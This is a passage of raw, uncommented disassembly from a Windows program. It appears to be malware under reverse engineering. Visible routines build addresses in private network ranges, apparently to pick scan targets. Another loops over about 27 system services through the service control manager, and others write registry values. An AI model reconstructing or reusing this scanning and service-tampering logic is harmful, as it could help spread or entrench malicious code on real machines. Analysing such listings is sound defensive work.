mov [ebp-131h], al
loc_43FF15: ; CODE XREF: .data:0043FEF1�j
; .data:0043FF07�j
cmp byte ptr [ebp-111h], 0Ah
jnz short loc_43FF4A
movzx eax, byte ptr [ebp-132h]
push eax
movzx eax, byte ptr [ebp-131h]
push eax
movzx eax, byte ptr [ebp-134h]
push eax
push 404D49h
lea eax, [ebp-130h]
push eax
call sub_44092D
add esp, 14h
loc_43FF4A: ; CODE XREF: .data:0043FF1C�j
movzx eax, byte ptr [ebp-111h]
cmp eax, 0ACh
jnz short loc_43FFA4
mov al, [ebp-112h]
cmp al, 0Fh
jbe short loc_43FFA4
cmp al, 21h
jnb short loc_43FFA4
call sub_440915
movzx edi, byte ptr [ebp-132h]
push edi
movzx edi, byte ptr [ebp-131h]
push edi
mov edx, eax
and edx, 8000000Fh
jge short loc_43FF8A
dec edx
or edx, 0FFFFFFF0h
inc edx
loc_43FF8A: ; CODE XREF: .data:0043FF83�j
mov edi, edx
add edi, 10h
push edi
push 404D3Ch
lea edi, [ebp-130h]
push edi
call sub_44092D
add esp, 14h
loc_43FFA4: ; CODE XREF: .data:0043FF56�j
; .data:0043FF60�j ...
movzx eax, byte ptr [ebp-111h]
cmp eax, 0C0h
jnz short loc_43FFE4
movzx eax, byte ptr [ebp-112h]
cmp eax, 0A8h
jnz short loc_43FFE4
movzx eax, byte ptr [ebp-132h]
push eax
movzx eax, byte ptr [ebp-131h]
push eax
push 404D2Eh
lea eax, [ebp-130h]
push eax
call sub_44092D
add esp, 10h
loc_43FFE4: ; CODE XREF: .data:0043FFB0�j
; .data:0043FFBE�j
lea eax, [ebp-130h]
push eax
call sub_4405B9
cmp [ebp-10Ch], eax
jz loc_43FE22
push dword ptr [ebp-10Ch]
call sub_4405C5
movzx edi, word ptr ds:loc_40408F+5
push edi
push eax
push 404D27h
lea edi, [ebp-0FFh]
push edi
call sub_44092D
add esp, 10h
loc_440024: ; CODE XREF: .data:0044004D�j
lea ecx, [ebp-0FFh]
or eax, 0FFFFFFFFh
loc_44002D: ; CODE XREF: .data:00440032�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_44002D
cmp eax, 19h
jz short loc_44004F
push 404D25h
lea eax, [ebp-0FFh]
push eax
call sub_440945
add esp, 8
jmp short loc_440024
; ---------------------------------------------------------------------------
loc_44004F: ; CODE XREF: .data:00440037�j
lea ecx, [ebp-0FFh]
or eax, 0FFFFFFFFh
loc_440058: ; CODE XREF: .data:0044005D�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_440058
push eax
lea edi, [ebp-0FFh]
push edi
mov edi, ebx
add edi, 9
push edi
call sub_4408F1
add esp, 0Ch
lea eax, [ebp-130h]
push eax
call sub_4405B9
push esi
push ebx
push eax
call sub_43F74D
add esp, 0Ch
mov [ebp-13Ch], eax
push 0
call sub_4408D9
add esp, 4
jmp loc_43FE22
; ---------------------------------------------------------------------------
db 5Fh, 5Eh, 5Bh
dd 4C2C9h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4400A8 proc near ; CODE XREF: .data:004400EA�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
call sub_440729
cmp eax, 80000000h
jb short loc_4400BF
mov eax, 3Ch
jmp short locret_4400E0
; ---------------------------------------------------------------------------
loc_4400BF: ; CODE XREF: sub_4400A8+E�j
push 0
lea eax, [ebp+var_4]
push eax
call sub_44060D
and [ebp+var_4], 2
cmp [ebp+var_4], 2
jnz short loc_4400DB
mov eax, 12Ch
jmp short locret_4400E0
; ---------------------------------------------------------------------------
loc_4400DB: ; CODE XREF: sub_4400A8+2A�j
mov eax, 64h
locret_4400E0: ; CODE XREF: sub_4400A8+15�j
; sub_4400A8+31�j
leave
retn
sub_4400A8 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
call sub_4400A8
mov ebx, eax
lea eax, [ebp-4]
push eax
push 0
push 0
push 401565h
push 0
push 0
call sub_4407B9
push eax
call sub_440711
xor esi, esi
jmp short loc_440143
; ---------------------------------------------------------------------------
loc_440111: ; CODE XREF: .data:00440145�j
lea eax, [ebp-4]
push eax
push 0
push 0
push 401E23h
push 0
push 0
call sub_4407B9
push eax
call sub_440711
mov eax, 0EA60h
xor edx, edx
div ebx
mov [ebp-8], eax
mov edi, eax
push eax
call sub_4408D9
pop ecx
inc esi
loc_440143: ; CODE XREF: .data:0044010F�j
cmp esi, ebx
jb short loc_440111
pop edi
pop esi
pop ebx
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44014E proc near ; CODE XREF: sub_44041D+AC�p
var_388 = dword ptr -388h
var_384 = dword ptr -384h
var_380 = dword ptr -380h
var_37C = dword ptr -37Ch
var_378 = dword ptr -378h
var_374 = dword ptr -374h
var_370 = dword ptr -370h
var_36C = byte ptr -36Ch
var_16C = dword ptr -16Ch
var_168 = byte ptr -168h
var_164 = dword ptr -164h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 388h
push ebx
push esi
push edi
lea edi, [ebp+var_16C]
lea esi, loc_404A34+4
mov ecx, 51h
rep movsd
and [ebp+var_24], 0
loc_440171: ; CODE XREF: sub_44014E+211�j
push 0F003Fh
push 0
push 0
call sub_440861
mov [ebp+var_28], eax
or eax, eax
jz loc_440358
push 0F003Fh
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_370], eax
push [ebp+eax+var_16C]
push [ebp+var_28]
call sub_44086D
mov ebx, eax
or eax, eax
jz loc_440350
lea eax, [ebp+var_20]
push eax
push 1
push ebx
call sub_440849
mov [ebp+var_4], eax
and [ebp+var_4], 0
loc_4401C9: ; CODE XREF: sub_44014E+A4�j
lea eax, [ebp+var_20]
push eax
push 4
push ebx
call sub_440849
or eax, eax
jz short loc_4401DF
cmp [ebp+var_1C], 1
jnz short loc_4401E1
loc_4401DF: ; CODE XREF: sub_44014E+89�j
jmp short loc_4401F4
; ---------------------------------------------------------------------------
loc_4401E1: ; CODE XREF: sub_44014E+8F�j
push 3E8h
call sub_440795
inc [ebp+var_4]
cmp [ebp+var_4], 0Ah
jb short loc_4401C9
loc_4401F4: ; CODE XREF: sub_44014E:loc_4401DF�j
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_374], eax
cmp [ebp+eax+var_168], 0
jz short loc_440212
push ebx
call sub_440855
loc_440212: ; CODE XREF: sub_44014E+BC�j
push ebx
call sub_44083D
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_378], eax
cmp [ebp+eax+var_164], 0
jz loc_440350
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_37C], eax
mov eax, [ebp+eax+var_164]
cmp byte ptr [eax], 0
jnz loc_4402D8
push 0
push 18h
lea eax, [ebp+var_36C]
push eax
push 0
call sub_440619
or eax, eax
jz short loc_4402D8
lea ecx, [ebp+var_36C]
or eax, 0FFFFFFFFh
loc_440271: ; CODE XREF: sub_44014E+128�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_440271
mov [ebp+var_4], eax
cmp [ebp+var_4], 1
jbe short loc_4402A5
mov eax, [ebp+var_4]
sub eax, 1
cmp [ebp+eax+var_36C], 5Ch
jz short loc_4402A5
push offset sub_404BA0
lea eax, [ebp+var_36C]
push eax
call sub_440945
add esp, 8
loc_4402A5: ; CODE XREF: sub_44014E+131�j
; sub_44014E+141�j
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_380], eax
mov eax, [ebp+eax+var_164]
push dword ptr [eax+8]
lea eax, [ebp+var_36C]
push eax
call sub_440945
add esp, 8
lea eax, [ebp+var_36C]
push eax
call sub_4407C5
loc_4402D8: ; CODE XREF: sub_44014E+FE�j
; sub_44014E+118�j
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_380], eax
mov eax, [ebp+eax+var_164]
cmp byte ptr [eax], 1
jnz short loc_440350
lea eax, [ebp+var_4]
push eax
push 20006h
push 0
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_384], eax
mov edx, [ebp+eax+var_164]
push dword ptr [edx+4]
mov eax, [ebp+eax+var_164]
push dword ptr [eax+0Ch]
call sub_44089D
or eax, eax
jnz short loc_440350
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_388], eax
mov eax, [ebp+eax+var_164]
push dword ptr [eax+8]
push [ebp+var_4]
call sub_440879
push [ebp+var_4]
call sub_440891
loc_440350: ; CODE XREF: sub_44014E+62�j
; sub_44014E+E0�j ...
push [ebp+var_28]
call sub_44083D
loc_440358: ; CODE XREF: sub_44014E+36�j
inc [ebp+var_24]
cmp [ebp+var_24], 1Bh
jb loc_440171
pop edi
pop esi
pop ebx
leave
retn 4
sub_44014E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 10h
push edi
mov eax, [ebp+0Ch]
cmp eax, 10h
jz short loc_4403FA
jg short loc_440387
cmp eax, 2
jz short loc_4403F1
jmp loc_440407
; ---------------------------------------------------------------------------
loc_440387: ; CODE XREF: .data:0044037B�j
cmp eax, 113h
jnz short loc_440407
and dword ptr [ebp-4], 0
mov dword ptr [ebp-8], 4
lea eax, [ebp-10h]
push eax
lea eax, [ebp-8]
push eax
lea eax, [ebp-4]
push eax
push 404B81h
push 404B85h
push 80000001h
call sub_43F38C
mov eax, dword ptr ds:sub_404098
mov [ebp-0Ch], eax
add [ebp-4], eax
push 4
push 4
lea eax, [ebp-4]
push eax
push 404B81h
push 404B85h
push 80000001h
call sub_43F321
add esp, 30h
push 0
push offset sub_404098
call sub_440741
jmp short loc_440418
; ---------------------------------------------------------------------------
loc_4403F1: ; CODE XREF: .data:00440380�j
push 0
call sub_44080D
jmp short loc_440418
; ---------------------------------------------------------------------------
loc_4403FA: ; CODE XREF: .data:00440379�j
push dword ptr ds:loc_402FFA+6
call sub_440825
jmp short loc_440418
; ---------------------------------------------------------------------------
loc_440407: ; CODE XREF: .data:00440382�j
; .data:0044038C�j
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_440831
loc_440418: ; CODE XREF: .data:004403EF�j
; .data:004403F8�j ...
pop edi
leave
retn 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44041D proc near ; CODE XREF: sub_440625+5C�p
var_2DC = byte ptr -2DCh
var_2D8 = byte ptr -2D8h
var_148 = dword ptr -148h
var_143 = byte ptr -143h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 2DCh
push edi
mov edi, [ebp+arg_0]
push [ebp+arg_8]
push offset sub_403010
call sub_4406A9
push 404B7Ch
lea eax, [ebp+var_143]
push eax
call sub_44092D
and [ebp+var_44], 0
lea eax, loc_4023A6+1
mov [ebp+var_40], eax
and [ebp+var_3C], 0
and [ebp+var_38], 0
mov [ebp+var_34], edi
and [ebp+var_30], 0
and [ebp+var_2C], 0
and [ebp+var_28], 0
and [ebp+var_24], 0
lea eax, [ebp+var_143]
mov [ebp+var_20], eax
lea eax, [ebp+var_44]
push eax
call sub_4407DD
push 0
push edi
push 0
push 0
push 0
push 0
push 0
push 0
push 0CF0000h
push 404D25h
lea eax, [ebp+var_143]
push eax
push 0
call sub_440819
mov dword ptr ds:loc_402FFA+6, eax
call sub_4406ED
push eax
call sub_43F2FC
lea eax, [ebp+var_2D8]
push eax
push 2
call sub_440559
push 0
call sub_44014E
lea eax, [ebp+var_2DC]
push eax
push 0
push 0
push 40211Dh
push 0
push 0
call sub_4407B9
push eax
call sub_440711
and [ebp+var_148], 0
push 4
push 4
lea eax, [ebp+var_148]
push eax
push 404B81h
push 404B85h
push 80000001h
call sub_43F321
add esp, 24h
push 0
push 2710h
push 1
push dword ptr ds:loc_402FFA+6
call sub_4407D1
jmp short loc_44053E
; ---------------------------------------------------------------------------
loc_44052C: ; CODE XREF: sub_44041D+132�j
lea eax, [ebp+var_1C]
push eax
call sub_4407F5
lea eax, [ebp+var_1C]
push eax
call sub_440801
loc_44053E: ; CODE XREF: sub_44041D+10D�j
push 0
push 0
push 0
lea eax, [ebp+var_1C]
push eax
call sub_4407E9
or eax, eax
jnz short loc_44052C
pop edi
leave
retn 10h
sub_44041D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440559 proc near ; CODE XREF: sub_44041D+A5�p
jmp dword ptr ds:loc_405249+3
sub_440559 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440565 proc near ; CODE XREF: .data:0043F623�p
jmp dword ptr ds:loc_40524E+2
sub_440565 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440571 proc near ; CODE XREF: .data:0043F5F0�p
jmp dword ptr ds:loc_405251+3
sub_440571 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44057D proc near ; CODE XREF: .data:0043F51E�p
; sub_43F74D+651�p
jmp dword ptr ds:loc_405256+2
sub_44057D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440589 proc near ; CODE XREF: sub_43F74D+1BA�p
jmp dword ptr ds:locret_40525C
sub_440589 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440595 proc near ; CODE XREF: sub_43FDAE+20�p
jmp dword ptr ds:loc_40525F+1
sub_440595 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4405A1 proc near ; CODE XREF: sub_43FDAE+E�p
jmp dword ptr ds:loc_405264
sub_4405A1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4405AD proc near ; CODE XREF: .data:0043F5DE�p
; sub_43F74D+197�p
jmp dword ptr ds:loc_405268
sub_4405AD endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4405B9 proc near ; CODE XREF: .data:0043FFEB�p
; .data:0044007C�p
jmp dword ptr ds:loc_40526C
sub_4405B9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4405C5 proc near ; CODE XREF: sub_43F74D+63�p
; .data:00440002�p
jmp dword ptr ds:loc_40526C+4
sub_4405C5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4405D1 proc near ; CODE XREF: .data:0043F60E�p
jmp dword ptr ds:loc_405271+3
sub_4405D1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4405DD proc near ; CODE XREF: .data:0043F3FE�p
; sub_43F74D+20B�p ...
jmp dword ptr ds:loc_405278
sub_4405DD endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4405E9 proc near ; CODE XREF: .data:0043F450�p
; .data:0043F48C�p ...
jmp dword ptr ds:loc_405279+3
sub_4405E9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4405F5 proc near ; CODE XREF: .data:0043F516�p
; sub_43F74D+649�p
jmp dword ptr ds:loc_40527E+2
sub_4405F5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440601 proc near ; CODE XREF: .data:0043F5A7�p
; sub_43F74D+48�p
jmp dword ptr ds:loc_405281+3
sub_440601 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44060D proc near ; CODE XREF: sub_4400A8+1D�p
jmp dword ptr ds:loc_40528C+4
sub_44060D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440619 proc near ; CODE XREF: sub_44014E+111�p
jmp dword ptr ds:loc_40529A+2
sub_440619 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_440625 proc near ; CODE XREF: .data:0043F244�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push edi
call sub_4406E1
mov edi, eax
cmp byte ptr [edi], 22h
jnz short loc_440659
push 22h
mov eax, edi
inc eax
push eax
call sub_440951
add esp, 8
mov [ebp+var_4], eax
or eax, eax
jz short loc_440674
mov edi, eax
inc edi
jmp short loc_440651
; ---------------------------------------------------------------------------
loc_440650: ; CODE XREF: sub_440625+2F�j
inc edi
loc_440651: ; CODE XREF: sub_440625+29�j
cmp byte ptr [edi], 20h
jz short loc_440650
jmp short loc_440674
; ---------------------------------------------------------------------------
loc_440658: ; CODE XREF: sub_440625+3E�j
inc edi
loc_440659: ; CODE XREF: sub_440625+F�j
movsx eax, byte ptr [edi]
or eax, eax
jz short loc_440665
cmp eax, 20h
jnz short loc_440658
loc_440665: ; CODE XREF: sub_440625+39�j
jmp short loc_440668
; ---------------------------------------------------------------------------
loc_440667: ; CODE XREF: sub_440625+4D�j
inc edi
loc_440668: ; CODE XREF: sub_440625:loc_440665�j
movsx eax, byte ptr [edi]
or eax, eax
jz short loc_440674
cmp eax, 20h
jz short loc_440667
loc_440674: ; CODE XREF: sub_440625+24�j
; sub_440625+31�j ...
push 0
call sub_440705
push 1
push edi
push 0
push eax
call sub_44041D
pop edi
leave
retn
sub_440625 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_440689 proc near ; CODE XREF: sub_43F74D+8�p
var_FFC = dword ptr -0FFCh
pop ecx
loc_44068A: ; CODE XREF: sub_440689+14�j
sub esp, 1000h
sub eax, 1000h
test [esp+0FFCh+var_FFC], eax
cmp eax, 1000h
jnb short loc_44068A
sub esp, eax
test [esp+0FFCh+var_FFC], eax
jmp ecx
sub_440689 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
db 0
; =============== S U B R O U T I N E =======================================
sub_4406A9 proc near ; CODE XREF: sub_44041D+15�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
xor eax, eax
mov ecx, 0FFFFFFFFh
xchg edi, edx
repne scasb
neg ecx
lea ecx, [ecx-1]
mov eax, [esp+arg_4]
xchg eax, esi
mov edi, [esp+arg_0]
rep movsb
xchg eax, esi
xchg edx, edi
mov eax, [esp+arg_0]
retn 8
sub_4406A9 endp
; ---------------------------------------------------------------------------
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4406D5 proc near ; CODE XREF: .data:0043F564�p
jmp dword ptr ds:loc_4052A7+1
sub_4406D5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4406E1 proc near ; CODE XREF: sub_440625+5�p
jmp dword ptr ds:loc_4052A7+5
sub_4406E1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4406ED proc near ; CODE XREF: sub_44041D+91�p
jmp dword ptr ds:loc_4052AE+2
sub_4406ED endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4406F9 proc near ; CODE XREF: .data:0043F56C�p
jmp dword ptr ds:loc_4052B3+1
sub_4406F9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440705 proc near ; CODE XREF: sub_440625+51�p
jmp dword ptr ds:loc_4052B5+3
sub_440705 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440711 proc near ; CODE XREF: .data:0043F59C�p
; .data:0043F640�p ...
jmp dword ptr ds:loc_4052B5+7
sub_440711 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44071D proc near ; CODE XREF: .data:0043FDF4�p
jmp dword ptr ds:loc_4052BF+1
sub_44071D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440729 proc near ; CODE XREF: sub_4400A8+4�p
jmp dword ptr ds:loc_4052BF+5
sub_440729 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440735 proc near ; CODE XREF: sub_43F2FC+1E�p
jmp dword ptr ds:loc_4052C7+1
sub_440735 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440741 proc near ; CODE XREF: .data:0043F53A�p
; .data:004403EA�p
jmp dword ptr ds:loc_4052CB+1
sub_440741 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44074D proc near ; CODE XREF: .data:0043F4DE�p
jmp dword ptr ds:loc_4052D0
sub_44074D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440759 proc near ; CODE XREF: .data:0043F579�p
; .data:0043FE0C�p
jmp dword ptr ds:loc_4052D0+4
sub_440759 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440765 proc near ; CODE XREF: .data:0043F556�p
jmp dword ptr ds:loc_4052D7+1
sub_440765 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440771 proc near ; CODE XREF: .data:0043F596�p
jmp dword ptr ds:loc_4052D7+5
sub_440771 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44077D proc near ; CODE XREF: sub_43F03F+13�p
jmp dword ptr ds:loc_4052D7+9
sub_44077D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440789 proc near ; CODE XREF: .data:0043F5B4�p
; sub_43F74D+17E�p
jmp dword ptr ds:loc_4052E3+1
sub_440789 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440795 proc near ; CODE XREF: .data:0043F4D2�p
; .data:0043F50C�p ...
jmp dword ptr ds:loc_4052E3+5
sub_440795 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4407A1 proc near ; CODE XREF: sub_43F74D+72�p
jmp dword ptr ds:loc_4052EA+2
sub_4407A1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4407AD proc near ; CODE XREF: sub_43F74D+BB�p
; sub_43F74D+D9�p ...
jmp dword ptr ds:loc_4052F0
sub_4407AD endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4407B9 proc near ; CODE XREF: .data:0043F63A�p
; .data:00440102�p ...
jmp dword ptr ds:sub_4052F4
sub_4407B9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4407C5 proc near ; CODE XREF: sub_44014E+185�p
jmp dword ptr ds:loc_4052F7+1
sub_4407C5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4407D1 proc near ; CODE XREF: sub_44041D+108�p
jmp dword ptr ds:loc_405300+4
sub_4407D1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4407DD proc near ; CODE XREF: sub_44041D+60�p
jmp dword ptr ds:loc_405308
sub_4407DD endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4407E9 proc near ; CODE XREF: sub_44041D+12B�p
jmp dword ptr ds:loc_405308+4
sub_4407E9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4407F5 proc near ; CODE XREF: sub_44041D+113�p
jmp dword ptr ds:loc_40530E+2
sub_4407F5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440801 proc near ; CODE XREF: sub_44041D+11C�p
jmp dword ptr ds:loc_405314
sub_440801 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44080D proc near ; CODE XREF: .data:004403F3�p
jmp dword ptr ds:loc_405314+4
sub_44080D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440819 proc near ; CODE XREF: sub_44041D+87�p
jmp dword ptr ds:loc_40531B+1
sub_440819 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440825 proc near ; CODE XREF: .data:00440400�p
jmp dword ptr ds:loc_40531F+1
sub_440825 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440831 proc near ; CODE XREF: .data:00440413�p
jmp dword ptr ds:loc_405324
sub_440831 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44083D proc near ; CODE XREF: sub_44014E+C5�p
; sub_44014E+205�p
jmp dword ptr ds:loc_40532E+2
sub_44083D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440849 proc near ; CODE XREF: sub_44014E+6F�p
; sub_44014E+82�p
jmp dword ptr ds:loc_405332+2
sub_440849 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440855 proc near ; CODE XREF: sub_44014E+BF�p
jmp dword ptr ds:loc_405336+2
sub_440855 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440861 proc near ; CODE XREF: sub_44014E+2C�p
jmp dword ptr ds:loc_40533B+1
sub_440861 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44086D proc near ; CODE XREF: sub_44014E+59�p
jmp dword ptr ds:loc_40533F+1
sub_44086D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440879 proc near ; CODE XREF: sub_44014E+1F5�p
jmp dword ptr ds:loc_405344
sub_440879 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440885 proc near ; CODE XREF: sub_43F321+21�p
jmp dword ptr ds:loc_405348
sub_440885 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440891 proc near ; CODE XREF: sub_43F321+4B�p
; sub_43F38C+40�p ...
jmp dword ptr ds:loc_40534B+1
sub_440891 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44089D proc near ; CODE XREF: sub_43F38C+16�p
; sub_44014E+1D1�p
jmp dword ptr ds:loc_405350
sub_44089D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4408A9 proc near ; CODE XREF: sub_43F38C+36�p
jmp dword ptr ds:loc_405350+4
sub_4408A9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4408B5 proc near ; CODE XREF: sub_43F321+41�p
jmp dword ptr ds:loc_405357+1
sub_4408B5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4408C1 proc near ; CODE XREF: sub_43F261+15�p
jmp dword ptr ds:loc_405362+2
sub_4408C1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
